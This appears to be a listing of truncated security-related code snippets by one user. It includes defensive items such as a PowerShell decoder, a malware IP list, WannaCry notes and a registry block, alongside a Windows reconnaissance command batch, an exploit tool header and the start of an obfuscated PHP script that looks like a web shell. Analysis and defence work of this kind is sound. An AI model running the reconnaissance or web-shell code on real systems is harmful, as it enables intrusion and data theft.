cephurs

Author: Casey Smith @subTee

ipconfig /all>> C:\Tools\Debug\1.txt
tasklist /v >> C:\Tools\Debug\1.txt 
net user >>C:\Tools\Debug\1.txt
net localgroup administrators>>C:\Tools\Debug\1.txt
netstat -ano >> C:\Tools\Debug\1.txt
net use >> C:\Tools\Debug\1.txt 
net view >> C:\Tools\Debug\1.txt 
net view /domain >> C:\Tools\Debug\1.txt 

cephurs

#
# Himawari-8 Downloader
#
#
#
# This script will scrape the latest image from the Himawari-8 satellite, recombining the tiled image,
# converting it to a JPG which is saved in My Pictures\Himawari\ and then set as the desktop background.
#
# http://himawari8.nict.go.jp/himawari8-image.htm
#

cephurs

2500+ IP addresses dedicated to serving malware.

1.168.33.91
103.12.217.155
103.242.11.1
103.242.11.94
103.243.51.129
103.253.141.43
103.255.101.168

cephurs

#coding: utf-8
'''
   --------------------------------------------------------------------------------------
# [+] JexBoss v1.0. @autor: João Filho Matos Figueiredo ([email protected])
# [+] Updates: https://github.com/joaomatosf/jexboss
# [+] SCRIPT original: http://1337day.com/exploit/23507
# [+] Free for distribution and modification, but the authorship should be preserved.
   --------------------------------------------------------------------------------------

   [+] SCRIPT Edited by: [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]

cephurs

############################################################################################
##
## Quick IOCTL Decoder!
##
## All credit for actual IOCTL decode logic:
##      http://www.osronline.com/article.cfm?article=229
## 
##
## To install:
##      Copy script into plugins directory, i.e: C:\Program Files\IDA 6.8\plugins

cephurs

## hacked together by @JohnLaTwC, Nov 2016, v 0.5
## This script attempts to decode common PowerShell encoded scripts. This version handles:
##  * base64 data which encode unicode, gzip, or deflate encoded strings
##  * it can operate on a file or stdin
##  * it can run recursively in the event of multiple layers
## With apologies to @Lee_Holmes for using Python instead of PowerShell
## 
import sys
import zlib
import re

cephurs

<?php
if (isset ($_GET['lU$6AJp0aXFt0RyAynP9OnL7FlzQ']))
{
$a1="Fil";
$c1="#d";
$c2="f5";
$color = $c1.$c2;
$bs="esM";
$da="an";
$default_action = $a1.$bs.$da;

cephurs

#Requires -Version 2

function New-InMemoryModule
{
<#
.SYNOPSIS

Creates an in-memory assembly and module

Author: Matthew Graeber (@mattifestation)

cephurs

WannaCry|WannaDecrypt0r NSA-Cybereweapon-Powered Ransomware Worm

• Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
• Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
• Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
• Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. (source: malwarebytes)
• Infections: NHS (uk), Telefonica (spain), FedEx (us), Russia interior ministry & Megafon (russia)
• Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes)

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

cephurs

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskdl.exe]
"Debugger"="taskkill /IM /F taskdl.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskse.exe]
"Debugger"="taskkill /IM /F taskse.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wannacry.exe]
"Debugger"="taskkill.exe /IM /F wannacry.exe"